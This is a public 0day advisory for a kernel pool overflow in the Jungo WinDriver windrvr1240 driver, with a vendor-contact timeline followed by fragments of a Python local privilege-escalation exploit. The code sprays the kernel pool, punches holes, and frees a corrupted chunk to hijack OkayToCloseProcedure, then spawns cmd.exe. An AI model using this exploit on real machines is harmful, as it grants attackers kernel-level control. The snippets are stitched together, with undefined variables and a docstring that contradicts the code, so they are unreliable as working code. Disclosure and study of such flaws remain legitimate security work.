This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.

The specific flaw exists within the processing of IOCTL 0x95382673 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.

Timeline: =========

2017-08-22 – Verified and sent to Jungo via [email protected]/[email protected]/[email protected]/[email protected] 2017-08-25 – No response from Jungo and two bounced emails 2017-08-26 – Attempted a follow up with the vendor via website chat 2017-08-26 – No response via the website chat 2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it" 2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release 2017-09-06 – No response from Jungo 2017-09-06 – Public 0day release of advisory

def we_can_spray(): """ Spray the Kernel Pool with IoCompletionReserve and Event Objects. The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. These are allocated from the Nonpaged kernel pool. """ handles = [] for i in range(0, 50000): handles.append(windll.kernel32.CreateMutexA(None, False, None)) # could do with some better validation if len(handles) > 0: return True return False

# make the holes to fill for hole in holes: for handle in hole: kernel32.CloseHandle(handle) return True

def trigger_lpe(): """ This function frees the IoCompletionReserve objects and this triggers the registered aexit, which is our controlled pointer to OkayToCloseProcedure. """ # free the corrupted chunk to trigger OkayToCloseProcedure # we dont know where the free chunk is, we just know its in one of the pages # full of Mutants and that its the 2nd chunk after the overflowed buffer. for v in to_free: kernel32.CloseHandle(v) os.system("cmd.exe")